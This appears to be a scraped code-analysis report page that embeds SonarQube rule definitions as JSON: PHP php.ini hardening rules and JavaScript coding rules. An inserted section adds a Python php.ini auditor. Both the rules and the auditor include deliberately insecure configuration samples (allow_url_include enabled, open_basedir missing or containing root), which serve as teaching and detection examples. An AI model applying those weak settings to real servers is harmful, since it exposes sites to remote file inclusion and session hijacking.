This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\"  Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\"  ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URLs. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing, could lay your site bare to attackers. 
Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini  Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. 
Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to URLs when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n  <li> see the URL over the user's shoulder <\/li>\n  <li> be sent the URL by the user <\/li>\n  <li> retrieve the URL from browser history <\/li>\n  <li> ... 
<\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. 
Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n  <li> It can significantly impair the readability of the code. <\/li>\n  <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n  <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. 
<\/li>\n  <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n  <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n  other than that caused by the increment or decrement operator <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n  effects <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n  same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a &lt; $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning 
<\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n  echo(\"i = $i\");\n  $i++;\n  if ($i &lt; 10){\n    goto loop;\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++){\n  echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/php.html by fixme
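The php.ini rules quoted in the flagged line above (S3333 through S3338) together form a hardening checklist: open_basedir present and free of "/" and ".", allow_url_fopen and allow_url_include off, cgi.force_redirect left on, session.use_trans_sid left off, enable_dl and file_uploads explicitly off. The script below is an added example, not code from the sonar-rules project or from the SonarSource rule descriptions; it parses a php.ini the way PHP reads it (comment lines ignored, so a commented-out open_basedir counts as absent) and reports each rule violation with the same on/off defaults the rule texts state. It assumes a Unix host (":" separates open_basedir paths) and the usual php.ini spellings of "enabled"; the two sample ini files are constructed for the example.

```python
"""Audit a php.ini against the checks SonarQube PHP rules S3333-S3338 describe.

Added example, not code from the sonar-rules project or from SonarSource.
"""
from __future__ import annotations

import re

# Values PHP applies when a directive is absent, taken from the rule text above:
# allow_url_fopen, cgi.force_redirect, enable_dl and file_uploads default to on,
# allow_url_include and session.use_trans_sid default to off.
DEFAULTS = {
    "allow_url_fopen": "1",
    "allow_url_include": "0",
    "cgi.force_redirect": "1",
    "session.use_trans_sid": "0",
    "enable_dl": "1",
    "file_uploads": "1",
}

# Assumption: the standard php.ini spellings of "enabled".
_ON_VALUES = {"1", "on", "true", "yes"}
_DIRECTIVE = re.compile(r"^([A-Za-z_][\w.]*)\s*=\s*(.*?)\s*$")


def parse_php_ini(text: str) -> dict[str, str]:
    """Return the active directives of a php.ini as {name: value}.

    Lines starting with ';' are comments, so a commented-out open_basedir counts
    as absent, exactly as PHP treats it. A trailing ';' comment after an unquoted
    value is stripped; a quoted value is returned without its quotes.
    """
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "[")):
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if value.startswith('"'):
            end = value.find('"', 1)
            value = value[1:end] if end != -1 else value[1:]
        else:
            value = value.split(";", 1)[0].strip()
        settings[name] = value
    return settings


def _is_on(value: str) -> bool:
    return value.strip().lower() in _ON_VALUES


def audit_php_ini(text: str) -> list[tuple[str, str]]:
    """Return (rule, message) pairs for every S3333-S3338 violation in `text`."""
    s = parse_php_ini(text)
    findings: list[tuple[str, str]] = []

    def effective(name: str) -> str:
        return s.get(name, DEFAULTS[name])

    # S3333: open_basedir must be present and must not list "/" or ".".
    # Assumption: a Unix host, where ':' separates the allowed paths.
    if "open_basedir" not in s:
        findings.append(("S3333", "open_basedir is not set; any file is readable"))
    else:
        bad = [p for p in s["open_basedir"].split(":") if p.strip() in ("/", ".")]
        if bad:
            findings.append(("S3333", f"open_basedir lists {bad}, which defeats the restriction"))

    # S3334: allow_url_fopen is on unless disabled, so silence is a finding;
    # allow_url_include is off by default, so only an explicit enable is reported.
    if _is_on(effective("allow_url_fopen")):
        findings.append(("S3334", "allow_url_fopen is not explicitly disabled"))
    if "allow_url_include" in s and _is_on(s["allow_url_include"]):
        findings.append(("S3334", "allow_url_include is enabled"))

    # S3335 / S3336: report only an explicit flip of the safe default.
    if "cgi.force_redirect" in s and not _is_on(s["cgi.force_redirect"]):
        findings.append(("S3335", "cgi.force_redirect is explicitly disabled"))
    if "session.use_trans_sid" in s and _is_on(s["session.use_trans_sid"]):
        findings.append(("S3336", "session.use_trans_sid puts session ids into URLs"))

    # S3337 / S3338: both default to on, so they must be turned off explicitly.
    if _is_on(effective("enable_dl")):
        findings.append(("S3337", "enable_dl is not explicitly set to 0"))
    if _is_on(effective("file_uploads")):
        findings.append(("S3338", "file_uploads is not explicitly disabled"))
    return findings


# Constructed sample inputs for this example, not taken from any real deployment.
WEAK_INI = """\
; php.ini - weak settings
; open_basedir="/var/www/app"   ; commented out, so no restriction applies
allow_url_include=1
cgi.force_redirect=0
session.use_trans_sid = 1
enable_dl=On
file_uploads=1  ; uploads left on
"""

HARDENED_INI = """\
[PHP]
open_basedir="/var/www/app:/var/lib/php/sessions"
allow_url_fopen=0
allow_url_include=0
cgi.force_redirect=1
session.use_trans_sid=0
enable_dl=0
file_uploads=0
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        result = audit_php_ini(ini)
        print(f"{label}: {len(result)} finding(s)")
        for rule, msg in result:
            print(f"  {rule}: {msg}")
```

The weak sample trips all six rules (seven findings, because S3334 reports both directives), the hardened sample none. Note the asymmetry the rule texts build in: for directives that default to on (allow_url_fopen, enable_dl, file_uploads) an absent line is a finding, while for the off-by-default ones only an explicit enable is reported; a checker that treats "absent" uniformly would miss the first group.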

      BUG found
      Open

              window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold. It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n  <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n  <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n  <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array literal.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3);  \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array();  \/\/ Noncompliant. 
Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') {  \/\/ Noncompliant\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...}  \/\/ Compliant\n\nwhile (line = nextLine()) {...}  \/\/ Compliant\n\nif (line = nextLine()) {...}  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n  <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n  <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - 
Do not perform assignments in conditional expressions\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&amp;<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&amp;&amp;<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&amp;<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a &amp; b) { ... } \/\/ Noncompliant; &amp; used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a &amp;&amp; b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code>&lt;&lt;<\/code>, <code>&gt;&gt;&gt;<\/code>, <code>&gt;&gt;<\/code>,\n<code>~<\/code>, <code>&amp;=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code>&lt;&lt;=<\/code>, <code>&gt;&gt;=<\/code>, <code>&gt;&gt;&gt;=<\/code> and\n<code>&amp;<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. 
As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n  if (arguments.length == 0) { \/\/ Compliant\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n  if (arguments.length == 0) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n  if (x === 2) {\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined &amp;&amp; x === 2) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be 
used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  for (i = 0; i &lt; 10; i++) {\n    if (i == 5) {\n      continue;  \/* Noncompliant *\/\n    }\n    alert(\"i = \" + i);\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n  for (i = 0; i &lt; 10; i++) {\n    if (i != 5) {  \/* Compliant *\/\n      alert(\"i = \" + i);\n    }\n  }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n  doSomething();\n} else if (x == 1) {\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n  doSomething();\n} else if (x == 1) {\n  doSomethingElse();\n} else {\n  throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. 
<\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. 
Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant 
Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n    doSomething(name);  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n  if (object.hasOwnProperty(name)) {\n    doSomething(name);\n  }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n  a[prop] = obj[prop];  \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. 
